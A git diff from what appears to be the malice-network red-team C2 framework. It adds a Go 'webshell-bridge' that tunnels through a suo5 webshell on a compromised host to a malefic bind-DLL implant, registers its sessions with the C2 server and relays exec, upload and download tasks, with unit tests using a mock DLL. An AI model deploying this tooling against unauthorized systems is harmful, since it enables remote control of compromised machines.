"io" + "net" + "sync" 
+ "time" + + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/logs" + malefic "github.com/chainreactors/malice-network/server/internal/parser/malefic" +) + +const ( + handshakeBridgeID uint32 = 0 + connectTimeout = 10 * time.Second + streamChanBuffer = 16 +) + +// Channel manages the malefic protocol connection to the bind DLL on the target. +// The bridge binary acts as a client, the DLL acts as a malefic bind server. +// Communication tunnels through suo5: transport.Dial -> suo5 HTTP -> target localhost. +// +// Streaming task support: OpenStream registers a per-taskID response channel +// that persists across multiple DLL responses. recvLoop dispatches incoming +// packets to the correct channel without removing it, enabling PTY, bridge-agent, +// and other streaming modules. CloseStream or CloseAllStreams handles cleanup. +type Channel struct { + conn net.Conn + transport dialTransport + dllAddr string + + sessionID uint32 // malefic session ID from DLL's first frame + parser *malefic.MaleficParser + + writeMu sync.Mutex // serializes writes to conn + pending map[uint32]chan *implantpb.Spite // taskID -> response channel + pendMu sync.Mutex // guards pending map + closed bool + closeMu sync.Mutex + recvDone chan struct{} // closed when recvLoop exits + recvErr error // terminal error from recvLoop +} + +type dialTransport interface { + DialContext(ctx context.Context, network, address string) (net.Conn, error) +} + +// NewChannel creates a channel that will connect through the given transport +// to the DLL's malefic bind server at dllAddr (e.g. "127.0.0.1:13338"). 
+func NewChannel(transport dialTransport, dllAddr, pipelineName string) *Channel { + return &Channel{ + transport: transport, + dllAddr: dllAddr, + pending: make(map[uint32]chan *implantpb.Spite), + recvDone: make(chan struct{}), + parser: malefic.NewMaleficParser(), + } +} + +// Connect dials the DLL through suo5. No handshake is performed here; +// malefic bind sends the Register frame immediately after TCP connect. +func (c *Channel) Connect(ctx context.Context) error { + dialCtx, cancel := context.WithTimeout(ctx, connectTimeout) + defer cancel() + + conn, err := c.transport.DialContext(dialCtx, "tcp", c.dllAddr) + if err != nil { + if dialCtx.Err() != nil { + return fmt.Errorf("connect timeout: %w", dialCtx.Err()) + } + return fmt.Errorf("dial DLL at %s: %w", c.dllAddr, err) + } + c.conn = conn + return nil +} + +// Handshake reads the initial registration data from the DLL. +// The malefic bind DLL sends a frame containing Spites{[Spite{Body: Register{...}}]} +// immediately after TCP connect. 
+func (c *Channel) Handshake() (*implantpb.Register, error) {
+	// Frame header carries the DLL's session ID and the payload length.
+	sid, length, err := c.parser.ReadHeader(c.conn)
+	if err != nil {
+		return nil, fmt.Errorf("read handshake header: %w", err)
+	}
+
+	buf := make([]byte, length)
+	if _, err := io.ReadFull(c.conn, buf); err != nil {
+		return nil, fmt.Errorf("read handshake payload: %w", err)
+	}
+
+	spites, err := c.parser.Parse(buf)
+	if err != nil {
+		return nil, fmt.Errorf("parse handshake: %w", err)
+	}
+
+	if len(spites.GetSpites()) == 0 {
+		return nil, fmt.Errorf("empty handshake frame")
+	}
+
+	// Only the first Spite of the handshake frame is inspected; it must carry
+	// a Register body. Any trailing spites in the frame are ignored here.
+	spite := spites.GetSpites()[0]
+	reg := spite.GetRegister()
+	if reg == nil {
+		return nil, fmt.Errorf("handshake spite has no Register body")
+	}
+
+	// Remember the DLL-assigned session ID; SendSpite marshals with it.
+	c.sessionID = sid
+	logs.Log.Debugf("handshake received: sid=%d name=%s modules=%v", sid, reg.Name, reg.Module)
+	return reg, nil
+}
+
+// StartRecvLoop starts a background goroutine that reads responses from the
+// DLL and dispatches them to the appropriate pending channel by taskID.
+// Unlike the old single-response model, channels are NOT removed on first
+// dispatch — they persist until explicitly closed via CloseStream.
+// Must be called after Connect + Handshake.
+func (c *Channel) StartRecvLoop() {
+	go c.recvLoop()
+}
+
+// recvLoop is the single reader of c.conn. It reads frames until a read
+// error occurs, then tears down all pending streams via handleRecvLoopExit.
+// Parse failures on an individual frame are logged and skipped, not fatal.
+func (c *Channel) recvLoop() {
+	defer close(c.recvDone)
+	for {
+		_, length, err := c.parser.ReadHeader(c.conn)
+		if err != nil {
+			c.handleRecvLoopExit(err)
+			return
+		}
+
+		buf := make([]byte, length)
+		if _, err := io.ReadFull(c.conn, buf); err != nil {
+			c.handleRecvLoopExit(fmt.Errorf("read payload: %w", err))
+			return
+		}
+
+		spites, err := c.parser.Parse(buf)
+		if err != nil {
+			logs.Log.Debugf("recv loop parse error (skipping frame): %v", err)
+			continue
+		}
+
+		// Dispatch each Spite by its TaskId — do NOT delete the channel entry.
+		for _, spite := range spites.GetSpites() {
+			taskID := spite.GetTaskId()
+			c.pendMu.Lock()
+			ch, ok := c.pending[taskID]
+			c.pendMu.Unlock()
+
+			if ok {
+				// Non-blocking send: a full stream buffer drops the spite
+				// rather than stalling the shared recv loop.
+				select {
+				case ch <- spite:
+				default:
+					logs.Log.Debugf("recv loop: channel full for task %d, dropping", taskID)
+				}
+			} else {
+				logs.Log.Debugf("recv loop: no waiter for task %d", taskID)
+			}
+		}
+	}
+}
+
+// handleRecvLoopExit records the terminal recv-loop error and closes every
+// pending stream channel so blocked waiters observe EOF. The error is only
+// logged when the channel was not deliberately closed by Close().
+// recvErr is written under pendMu, matching the map it accompanies.
+func (c *Channel) handleRecvLoopExit(err error) {
+	c.closeMu.Lock()
+	closed := c.closed
+	c.closeMu.Unlock()
+	if !closed {
+		logs.Log.Debugf("recv loop error: %v", err)
+	}
+	// Close all pending channels to signal EOF to waiters.
+	c.pendMu.Lock()
+	c.recvErr = err
+	for id, ch := range c.pending {
+		close(ch)
+		delete(c.pending, id)
+	}
+	c.pendMu.Unlock()
+}
+
+// OpenStream registers a buffered response channel for taskID and returns the read end.
+// The channel receives all DLL responses for this taskID until CloseStream is called
+// or the recvLoop exits (which closes the channel).
+// Registering the same taskID twice replaces the previous channel entry.
+func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite {
+	ch := make(chan *implantpb.Spite, streamChanBuffer)
+	c.pendMu.Lock()
+	c.pending[taskID] = ch
+	c.pendMu.Unlock()
+	return ch
+}
+
+// SendSpite sends a single spite to the DLL for the given taskID.
+// Thread-safe: multiple goroutines can call SendSpite concurrently.
+// Note that it mutates the caller's spite by stamping spite.TaskId.
+// NOTE(review): the closed check and the conn.Write are under different
+// mutexes, so a Close racing this call surfaces as a write error rather
+// than "channel closed" — presumably acceptable; confirm.
+func (c *Channel) SendSpite(taskID uint32, spite *implantpb.Spite) error {
+	c.closeMu.Lock()
+	if c.closed || c.conn == nil {
+		c.closeMu.Unlock()
+		return fmt.Errorf("channel closed")
+	}
+	c.closeMu.Unlock()
+
+	spite.TaskId = taskID
+	spites := &implantpb.Spites{Spites: []*implantpb.Spite{spite}}
+
+	// Marshal with the session ID learned during Handshake.
+	data, err := c.parser.Marshal(spites, c.sessionID)
+	if err != nil {
+		return fmt.Errorf("marshal spite: %w", err)
+	}
+
+	// writeMu serializes whole-frame writes so concurrent senders
+	// cannot interleave bytes on the wire.
+	c.writeMu.Lock()
+	_, err = c.conn.Write(data)
+	c.writeMu.Unlock()
+	return err
+}
+
+// CloseStream removes the pending channel for taskID.
+// Does NOT close the channel itself to avoid send-on-closed-channel panic
+// if recvLoop is concurrently dispatching.
+func (c *Channel) CloseStream(taskID uint32) {
+	c.pendMu.Lock()
+	delete(c.pending, taskID)
+	c.pendMu.Unlock()
+}
+
+// CloseAllStreams closes and removes all pending channels.
+// Safe to call during teardown (holds pendMu for the entire operation).
+// NOTE(review): unlike CloseStream, this DOES close the channels; it is
+// presumably only safe once recvLoop has stopped dispatching — confirm
+// the teardown ordering at the call sites.
+func (c *Channel) CloseAllStreams() {
+	c.pendMu.Lock()
+	for id, ch := range c.pending {
+		close(ch)
+		delete(c.pending, id)
+	}
+	c.pendMu.Unlock()
+}
+
+// Forward sends a Spite request to the DLL and waits for a single response.
+// Convenience wrapper over OpenStream + SendSpite + CloseStream for unary tasks.
+// Blocks until the first response for taskID arrives or the stream channel
+// is closed (recvLoop exit); there is no per-call timeout here.
+func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) {
+	ch := c.OpenStream(taskID)
+
+	if err := c.SendSpite(taskID, spite); err != nil {
+		c.CloseStream(taskID)
+		return nil, err
+	}
+
+	// ok == false means recvLoop closed the stream before any response.
+	resp, ok := <-ch
+	c.CloseStream(taskID)
+	if !ok {
+		return nil, fmt.Errorf("channel closed during forward")
+	}
+	return resp, nil
+}
+
+// WithSecure enables Age encryption/decryption on the malefic wire protocol.
+// Delegates key handling entirely to the underlying parser.
+func (c *Channel) WithSecure(keyPair *clientpb.KeyPair) {
+	c.parser.WithSecure(keyPair)
+}
+
+// Close shuts down the malefic connection.
+func (c *Channel) Close() error { + c.closeMu.Lock() + defer c.closeMu.Unlock() + + if c.closed { + return nil + } + c.closed = true + if c.conn != nil { + return c.conn.Close() + } + return nil +} diff --git a/server/cmd/webshell-bridge/channel_test.go b/server/cmd/webshell-bridge/channel_test.go new file mode 100644 index 00000000..46635264 --- /dev/null +++ b/server/cmd/webshell-bridge/channel_test.go @@ -0,0 +1,541 @@ +package main + +import ( + "bytes" + "encoding/binary" + "io" + "net" + "sync" + "testing" + "time" + + "github.com/chainreactors/IoM-go/consts" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/malice-network/helper/utils/compress" + malefic "github.com/chainreactors/malice-network/server/internal/parser/malefic" + "github.com/gookit/config/v2" + "google.golang.org/protobuf/proto" +) + +func init() { + // Initialize config for the malefic parser's packet length check. + config.Set(consts.ConfigMaxPacketLength, 10*1024*1024) +} + +// testWriteMaleficFrame writes a malefic-framed message to conn for test use. +func testWriteMaleficFrame(conn net.Conn, spites *implantpb.Spites, sid uint32) error { + data, err := proto.Marshal(spites) + if err != nil { + return err + } + data, err = compress.Compress(data) + if err != nil { + return err + } + var buf bytes.Buffer + buf.WriteByte(malefic.DefaultStartDelimiter) + binary.Write(&buf, binary.LittleEndian, sid) + binary.Write(&buf, binary.LittleEndian, int32(len(data))) + buf.Write(data) + buf.WriteByte(malefic.DefaultEndDelimiter) + _, err = conn.Write(buf.Bytes()) + return err +} + +// testReadMaleficFrame reads a malefic-framed message from conn for test use. 
+// testReadMaleficFrame reads one malefic frame: a HeaderLength-byte header
+// (start delimiter, LE session id, LE payload length), the payload, and the
+// trailing end-delimiter byte. The payload is decompressed when possible and
+// unmarshaled into Spites.
+// NOTE(review): the end delimiter is read (buf has length+1 bytes) but never
+// validated, and a decompression failure silently falls back to the raw
+// payload — both are presumably fine for test use only.
+func testReadMaleficFrame(conn net.Conn) (uint32, *implantpb.Spites, error) {
+	header := make([]byte, malefic.HeaderLength)
+	if _, err := io.ReadFull(conn, header); err != nil {
+		return 0, nil, err
+	}
+	if header[0] != malefic.DefaultStartDelimiter {
+		return 0, nil, io.ErrUnexpectedEOF
+	}
+	sid := binary.LittleEndian.Uint32(header[1:5])
+	length := binary.LittleEndian.Uint32(header[5:9])
+	// +1 consumes the end delimiter along with the payload.
+	buf := make([]byte, length+1)
+	if _, err := io.ReadFull(conn, buf); err != nil {
+		return 0, nil, err
+	}
+	payload := buf[:length]
+	decompressed, err := compress.Decompress(payload)
+	if err != nil {
+		decompressed = payload
+	}
+	spites := &implantpb.Spites{}
+	if err := proto.Unmarshal(decompressed, spites); err != nil {
+		return 0, nil, err
+	}
+	return sid, spites, nil
+}
+
+// mockMaleficDLL simulates a malefic bind DLL.
+// It accepts one connection, sends a Register handshake frame,
+// then echoes Spite requests back with a modified Name field.
+type mockMaleficDLL struct {
+	ln        net.Listener // loopback listener standing in for the DLL's bind server
+	register  *implantpb.Register
+	sessionID uint32 // session id stamped on every frame the mock emits
+}
+
+// newMockMaleficDLL binds an ephemeral loopback port and returns a mock
+// preloaded with a fixed Register (name, three modules, Windows sysinfo)
+// and session id 42, which tests assert against.
+func newMockMaleficDLL(t *testing.T) *mockMaleficDLL {
+	t.Helper()
+	ln, err := net.Listen("tcp", "127.0.0.1:0")
+	if err != nil {
+		t.Fatalf("mock DLL listen: %v", err)
+	}
+	return &mockMaleficDLL{
+		ln:        ln,
+		sessionID: 42,
+		register: &implantpb.Register{
+			Name:   "test-dll",
+			Module: []string{"exec", "upload", "download"},
+			Sysinfo: &implantpb.SysInfo{
+				Os: &implantpb.Os{
+					Name: "Windows",
+				},
+			},
+		},
+	}
+}
+
+// addr returns the mock's dialable host:port.
+func (m *mockMaleficDLL) addr() string {
+	return m.ln.Addr().String()
+}
+
+// close stops the mock's listener; in-flight connections are unaffected.
+func (m *mockMaleficDLL) close() {
+	m.ln.Close()
+}
+
+// serve handles one client connection through the full malefic protocol.
+// serve accepts a single connection, sends the Register handshake, then
+// performs handleN request/response roundtrips: each incoming Spite is echoed
+// back with Name prefixed "resp:" and the TaskId preserved. handleN == 0
+// means handshake only. Failures are reported via t.Errorf (not Fatalf,
+// since this runs on a non-test goroutine).
+func (m *mockMaleficDLL) serve(t *testing.T, handleN int) {
+	t.Helper()
+	conn, err := m.ln.Accept()
+	if err != nil {
+		t.Errorf("mock DLL accept: %v", err)
+		return
+	}
+	defer conn.Close()
+
+	// Send Register handshake as malefic frame
+	regSpite := &implantpb.Spites{
+		Spites: []*implantpb.Spite{
+			{
+				Body: &implantpb.Spite_Register{Register: m.register},
+			},
+		},
+	}
+	if err := testWriteMaleficFrame(conn, regSpite, m.sessionID); err != nil {
+		t.Errorf("mock DLL send handshake: %v", err)
+		return
+	}
+
+	// Echo Spite requests back with modified Name
+	for i := 0; i < handleN; i++ {
+		sid, spites, err := testReadMaleficFrame(conn)
+		if err != nil {
+			t.Errorf("mock DLL read spite: %v", err)
+			return
+		}
+
+		// Echo with the same sid the client sent, mirroring a real DLL.
+		respSpites := &implantpb.Spites{}
+		for _, spite := range spites.GetSpites() {
+			respSpites.Spites = append(respSpites.Spites, &implantpb.Spite{
+				Name:   "resp:" + spite.Name,
+				TaskId: spite.TaskId,
+			})
+		}
+		if err := testWriteMaleficFrame(conn, respSpites, sid); err != nil {
+			t.Errorf("mock DLL send response: %v", err)
+			return
+		}
+	}
+}
+
+// dialMockDLL connects to the mock DLL and returns a Channel ready for Handshake/Forward.
+func dialMockDLL(t *testing.T, addr string) *Channel { + t.Helper() + conn, err := net.DialTimeout("tcp", addr, 5*time.Second) + if err != nil { + t.Fatalf("dial mock DLL: %v", err) + } + return &Channel{ + conn: conn, + dllAddr: addr, + pending: make(map[uint32]chan *implantpb.Spite), + recvDone: make(chan struct{}), + parser: malefic.NewMaleficParser(), + } +} + +func TestChannelConnect(t *testing.T) { + mock := newMockMaleficDLL(t) + defer mock.close() + + // Accept the connection in background + accepted := make(chan struct{}) + go func() { + conn, err := mock.ln.Accept() + if err != nil { + return + } + conn.Close() + close(accepted) + }() + + conn, err := net.DialTimeout("tcp", mock.addr(), 5*time.Second) + if err != nil { + t.Fatalf("dial: %v", err) + } + conn.Close() + + select { + case <-accepted: + case <-time.After(time.Second): + t.Fatal("connection not accepted") + } +} + +func TestChannelHandshake(t *testing.T) { + mock := newMockMaleficDLL(t) + defer mock.close() + + go mock.serve(t, 0) // Handshake only + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + reg, err := ch.Handshake() + if err != nil { + t.Fatalf("handshake: %v", err) + } + + if reg.Name != "test-dll" { + t.Errorf("expected name 'test-dll', got %q", reg.Name) + } + if len(reg.Module) != 3 { + t.Errorf("expected 3 modules, got %d", len(reg.Module)) + } + if reg.Sysinfo == nil || reg.Sysinfo.Os == nil || reg.Sysinfo.Os.Name != "Windows" { + t.Errorf("expected Windows sysinfo, got %+v", reg.Sysinfo) + } + if ch.sessionID != 42 { + t.Errorf("expected sessionID 42, got %d", ch.sessionID) + } +} + +func TestChannelForward(t *testing.T) { + mock := newMockMaleficDLL(t) + defer mock.close() + + go mock.serve(t, 2) // Handshake + 2 Spite roundtrips + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + + ch.StartRecvLoop() + + // Forward Spite #1 + resp1, err := ch.Forward(1, &implantpb.Spite{Name: 
"exec"}) + if err != nil { + t.Fatalf("forward #1: %v", err) + } + if resp1.Name != "resp:exec" { + t.Errorf("expected 'resp:exec', got %q", resp1.Name) + } + + // Forward Spite #2 + resp2, err := ch.Forward(2, &implantpb.Spite{Name: "upload"}) + if err != nil { + t.Fatalf("forward #2: %v", err) + } + if resp2.Name != "resp:upload" { + t.Errorf("expected 'resp:upload', got %q", resp2.Name) + } +} + +func TestChannelForwardBatch(t *testing.T) { + // Test that recvLoop correctly dispatches a batch response + // (one malefic frame containing multiple Spites). + mock := newMockMaleficDLL(t) + defer mock.close() + + go func() { + conn, err := mock.ln.Accept() + if err != nil { + return + } + defer conn.Close() + + // Send handshake + regSpite := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Body: &implantpb.Spite_Register{Register: mock.register}}, + }, + } + testWriteMaleficFrame(conn, regSpite, mock.sessionID) + + // Read two individual requests + var requests []*implantpb.Spite + for i := 0; i < 2; i++ { + _, spites, err := testReadMaleficFrame(conn) + if err != nil { + return + } + requests = append(requests, spites.GetSpites()...) 
+ } + + // Respond with a single batch frame containing both responses + batchResp := &implantpb.Spites{} + for _, req := range requests { + batchResp.Spites = append(batchResp.Spites, &implantpb.Spite{ + Name: "resp:" + req.Name, + TaskId: req.TaskId, + }) + } + testWriteMaleficFrame(conn, batchResp, mock.sessionID) + }() + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + ch.StartRecvLoop() + + // Send two requests concurrently + var wg sync.WaitGroup + results := make(map[uint32]string) + var mu sync.Mutex + + for _, tc := range []struct { + id uint32 + name string + }{ + {10, "exec"}, + {20, "download"}, + } { + wg.Add(1) + go func(id uint32, name string) { + defer wg.Done() + resp, err := ch.Forward(id, &implantpb.Spite{Name: name}) + if err != nil { + t.Errorf("forward %d: %v", id, err) + return + } + mu.Lock() + results[id] = resp.Name + mu.Unlock() + }(tc.id, tc.name) + } + + wg.Wait() + + if results[10] != "resp:exec" { + t.Errorf("task 10: expected 'resp:exec', got %q", results[10]) + } + if results[20] != "resp:download" { + t.Errorf("task 20: expected 'resp:download', got %q", results[20]) + } +} + +func TestChannelStreamMultipleResponses(t *testing.T) { + // Test that OpenStream receives multiple responses for the same taskID + // without the channel being removed after the first one. 
+ mock := newMockMaleficDLL(t) + defer mock.close() + + const taskID uint32 = 100 + const numResponses = 3 + + go func() { + conn, err := mock.ln.Accept() + if err != nil { + return + } + defer conn.Close() + + // Send handshake + regSpite := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Body: &implantpb.Spite_Register{Register: mock.register}}, + }, + } + testWriteMaleficFrame(conn, regSpite, mock.sessionID) + + // Read the initial request + testReadMaleficFrame(conn) + + // Send multiple responses for the same taskID in separate frames + for i := 0; i < numResponses; i++ { + resp := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + { + Name: "chunk:" + string(rune('A'+i)), + TaskId: taskID, + }, + }, + } + if err := testWriteMaleficFrame(conn, resp, mock.sessionID); err != nil { + return + } + } + }() + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + + // Open a persistent stream for this task + respCh := ch.OpenStream(taskID) + ch.StartRecvLoop() + + // Send the initial request + if err := ch.SendSpite(taskID, &implantpb.Spite{Name: "start-stream"}); err != nil { + t.Fatalf("send spite: %v", err) + } + + // Collect all responses + var received []string + for i := 0; i < numResponses; i++ { + select { + case spite, ok := <-respCh: + if !ok { + t.Fatalf("channel closed after %d responses", i) + } + received = append(received, spite.Name) + case <-time.After(2 * time.Second): + t.Fatalf("timeout waiting for response %d", i) + } + } + + if len(received) != numResponses { + t.Fatalf("expected %d responses, got %d", numResponses, len(received)) + } + for i, name := range received { + expected := "chunk:" + string(rune('A'+i)) + if name != expected { + t.Errorf("response %d: expected %q, got %q", i, expected, name) + } + } + + ch.CloseStream(taskID) +} + +func TestChannelCloseStream(t *testing.T) { + // Verify that CloseStream removes the channel so subsequent dispatches 
+ // are dropped (logged as "no waiter"). + mock := newMockMaleficDLL(t) + defer mock.close() + + const taskID uint32 = 200 + + go func() { + conn, err := mock.ln.Accept() + if err != nil { + return + } + defer conn.Close() + + // Handshake + regSpite := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Body: &implantpb.Spite_Register{Register: mock.register}}, + }, + } + testWriteMaleficFrame(conn, regSpite, mock.sessionID) + + // Read initial request + testReadMaleficFrame(conn) + + // Send first response + testWriteMaleficFrame(conn, &implantpb.Spites{ + Spites: []*implantpb.Spite{{Name: "first", TaskId: taskID}}, + }, mock.sessionID) + + // Small delay for CloseStream to execute + time.Sleep(100 * time.Millisecond) + + // Send second response (should be dropped after CloseStream) + testWriteMaleficFrame(conn, &implantpb.Spites{ + Spites: []*implantpb.Spite{{Name: "second", TaskId: taskID}}, + }, mock.sessionID) + }() + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + + respCh := ch.OpenStream(taskID) + ch.StartRecvLoop() + + if err := ch.SendSpite(taskID, &implantpb.Spite{Name: "req"}); err != nil { + t.Fatalf("send: %v", err) + } + + // Receive first response + select { + case spite := <-respCh: + if spite.Name != "first" { + t.Errorf("expected 'first', got %q", spite.Name) + } + case <-time.After(2 * time.Second): + t.Fatal("timeout waiting for first response") + } + + // Close the stream + ch.CloseStream(taskID) + + // Second response should be dropped — the channel should not receive it. + // Wait briefly to let the mock DLL send it. 
+ time.Sleep(200 * time.Millisecond) + + select { + case _, ok := <-respCh: + if ok { + t.Error("received unexpected response after CloseStream") + } + default: + // Expected: nothing in channel + } +} + +func TestChannelCloseIdempotent(t *testing.T) { + ch := &Channel{ + pending: make(map[uint32]chan *implantpb.Spite), + recvDone: make(chan struct{}), + parser: malefic.NewMaleficParser(), + } + + if err := ch.Close(); err != nil { + t.Fatalf("close without conn: %v", err) + } + if err := ch.Close(); err != nil { + t.Fatalf("double close: %v", err) + } +} + +func TestChannelForwardAfterClose(t *testing.T) { + ch := &Channel{ + closed: true, + pending: make(map[uint32]chan *implantpb.Spite), + recvDone: make(chan struct{}), + parser: malefic.NewMaleficParser(), + } + + _, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) + if err == nil { + t.Fatal("expected error forwarding on closed channel") + } +} diff --git a/server/cmd/webshell-bridge/config.go b/server/cmd/webshell-bridge/config.go new file mode 100644 index 00000000..800a9d43 --- /dev/null +++ b/server/cmd/webshell-bridge/config.go @@ -0,0 +1,13 @@ +package main + +// Config holds the bridge configuration. +type Config struct { + AuthFile string // path to listener.auth mTLS certificate + ServerAddr string // optional server address override + ListenerName string // listener name for registration + ListenerIP string // listener external IP + PipelineName string // pipeline name + Suo5URL string // suo5 webshell URL (e.g. suo5://target/suo5.jsp) + DLLAddr string // target-side malefic bind DLL address (e.g. 
127.0.0.1:13338) + Debug bool // enable debug logging +} diff --git a/server/cmd/webshell-bridge/main.go b/server/cmd/webshell-bridge/main.go new file mode 100644 index 00000000..443aa74f --- /dev/null +++ b/server/cmd/webshell-bridge/main.go @@ -0,0 +1,67 @@ +package main + +import ( + "context" + "flag" + "fmt" + "os" + "os/signal" + "syscall" + + "github.com/chainreactors/IoM-go/consts" + "github.com/chainreactors/logs" + "github.com/gookit/config/v2" +) + +func main() { + cfg := &Config{} + flag.StringVar(&cfg.AuthFile, "auth", "", "path to listener.auth mTLS certificate file") + flag.StringVar(&cfg.ServerAddr, "server", "", "server address (overrides auth file)") + flag.StringVar(&cfg.ListenerName, "listener", "webshell-listener", "listener name") + flag.StringVar(&cfg.ListenerIP, "ip", "127.0.0.1", "listener external IP") + flag.StringVar(&cfg.PipelineName, "pipeline", "", "pipeline name (auto-generated if empty)") + flag.StringVar(&cfg.Suo5URL, "suo5", "", "suo5 webshell URL (e.g. suo5://target/suo5.jsp)") + flag.StringVar(&cfg.DLLAddr, "dll-addr", "127.0.0.1:13338", "target-side malefic bind DLL address") + flag.BoolVar(&cfg.Debug, "debug", false, "enable debug logging") + flag.Parse() + + if cfg.AuthFile == "" || cfg.Suo5URL == "" { + fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --suo5 \n") + flag.PrintDefaults() + os.Exit(1) + } + + if cfg.PipelineName == "" { + cfg.PipelineName = fmt.Sprintf("webshell_%s", cfg.ListenerName) + } + + if cfg.Debug { + logs.Log.SetLevel(logs.DebugLevel) + } + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + + // Handle graceful shutdown + sigCh := make(chan os.Signal, 1) + signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) + go func() { + <-sigCh + logs.Log.Important("shutting down...") + cancel() + }() + + // Initialize packet length config for the malefic parser. 
+ config.Set(consts.ConfigMaxPacketLength, 10*1024*1024) + + bridge, err := NewBridge(cfg) + if err != nil { + logs.Log.Errorf("failed to create bridge: %v", err) + os.Exit(1) + } + + if err := bridge.Start(ctx); err != nil { + logs.Log.Errorf("bridge exited with error: %v", err) + os.Exit(1) + } +} diff --git a/server/cmd/webshell-bridge/main_test.go b/server/cmd/webshell-bridge/main_test.go new file mode 100644 index 00000000..83667a42 --- /dev/null +++ b/server/cmd/webshell-bridge/main_test.go @@ -0,0 +1,15 @@ +package main + +import ( + "io" + "os" + "testing" + + "github.com/chainreactors/logs" +) + +func TestMain(m *testing.M) { + logs.Log = logs.NewLogger(logs.WarnLevel) + logs.Log.SetOutput(io.Discard) + os.Exit(m.Run()) +} diff --git a/server/cmd/webshell-bridge/session.go b/server/cmd/webshell-bridge/session.go new file mode 100644 index 00000000..2bd4cd4e --- /dev/null +++ b/server/cmd/webshell-bridge/session.go @@ -0,0 +1,118 @@ +package main + +import ( + "context" + "fmt" + "time" + + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/IoM-go/proto/services/listenerrpc" + "github.com/chainreactors/logs" +) + +// Session represents a single implant session managed by the bridge. +// Each session owns a Channel that communicates with the malefic bind DLL +// on the target through the malefic protocol over suo5. +type Session struct { + ID string + PipelineID string + ListenerID string + + channel *Channel +} + +// NewSession reads the malefic handshake from the DLL (SysInfo + Modules) +// and registers the session with the server. 
+// NOTE(review): by Go convention ctx should be the first parameter; it is
+// second here — consider reordering before the API calcifies.
+func NewSession(
+	rpc listenerrpc.ListenerRPCClient,
+	ctx context.Context,
+	id, pipelineID, listenerID string,
+	channel *Channel,
+) (*Session, error) {
+	// Read registration data from DLL via malefic handshake
+	reg, err := channel.Handshake()
+	if err != nil {
+		return nil, fmt.Errorf("handshake: %w", err)
+	}
+
+	sess := &Session{
+		ID:         id,
+		PipelineID: pipelineID,
+		ListenerID: listenerID,
+		channel:    channel,
+	}
+
+	// Use real data from the DLL
+	// NOTE(review): id[:8] panics if id is shorter than 8 characters —
+	// presumably ids are UUID-length; confirm at the call site.
+	if reg.Name == "" {
+		reg.Name = fmt.Sprintf("webshell-%s", id[:8])
+	}
+
+	// Register the session with the server using the DLL's real sysinfo
+	// and module list; RawId carries the malefic session id from handshake.
+	_, err = rpc.Register(ctx, &clientpb.RegisterSession{
+		SessionId:    id,
+		PipelineId:   pipelineID,
+		ListenerId:   listenerID,
+		RawId:        channel.sessionID,
+		RegisterData: reg,
+		Target:       fmt.Sprintf("webshell://%s", id),
+	})
+	if err != nil {
+		return nil, fmt.Errorf("register session: %w", err)
+	}
+
+	logs.Log.Importantf("session registered: %s (name=%s, modules=%d, sid=%d)", id, reg.Name, len(reg.Module), channel.sessionID)
+	return sess, nil
+}
+
+// HandleUnary forwards a Spite request through the malefic channel to the
+// bind DLL and returns a single response. Use for non-streaming tasks.
+func (s *Session) HandleUnary(taskID uint32, req *implantpb.Spite) (*implantpb.Spite, error) {
+	return s.channel.Forward(taskID, req)
+}
+
+// OpenTaskStream registers a persistent response channel for a streaming task.
+// Returns a channel that receives all DLL responses for this taskID.
+func (s *Session) OpenTaskStream(taskID uint32) <-chan *implantpb.Spite {
+	return s.channel.OpenStream(taskID)
+}
+
+// SendTaskSpite sends a spite to the DLL for a task (streaming or initial request).
+func (s *Session) SendTaskSpite(taskID uint32, spite *implantpb.Spite) error {
+	return s.channel.SendSpite(taskID, spite)
+}
+
+// CloseTaskStream cleans up a streaming task's response channel.
+func (s *Session) CloseTaskStream(taskID uint32) {
+	s.channel.CloseStream(taskID)
+}
+
+// Checkin sends a heartbeat for this session.
+// The nonce is the current Unix time masked to a non-negative int32; failures
+// are logged at debug level only — the server infers death from missed checkins.
+func (s *Session) Checkin(rpc listenerrpc.ListenerRPCClient, ctx context.Context) {
+	_, err := rpc.Checkin(ctx, &implantpb.Ping{
+		Nonce: int32(time.Now().Unix() & 0x7FFFFFFF),
+	})
+	if err != nil {
+		logs.Log.Debugf("checkin failed for %s: %v", s.ID, err)
+	}
+}
+
+// Close shuts down the session's malefic channel.
+// The server will mark the session dead when checkins stop.
+// Streams are drained first so waiters observe EOF before the conn drops.
+func (s *Session) Close() error {
+	logs.Log.Importantf("session %s closing (server will mark dead after checkin timeout)", s.ID)
+	if s.channel != nil {
+		s.channel.CloseAllStreams()
+		return s.channel.Close()
+	}
+	return nil
+}
+
+// Alive returns true if the underlying malefic channel is still connected.
+// NOTE(review): reaches directly into the channel's closeMu/closed fields;
+// a Channel.Alive() accessor would keep the locking encapsulated.
+func (s *Session) Alive() bool {
+	if s.channel == nil {
+		return false
+	}
+	s.channel.closeMu.Lock()
+	defer s.channel.closeMu.Unlock()
+	return !s.channel.closed
+}
diff --git a/server/cmd/webshell-bridge/transport.go b/server/cmd/webshell-bridge/transport.go
new file mode 100644
index 00000000..91783d78
--- /dev/null
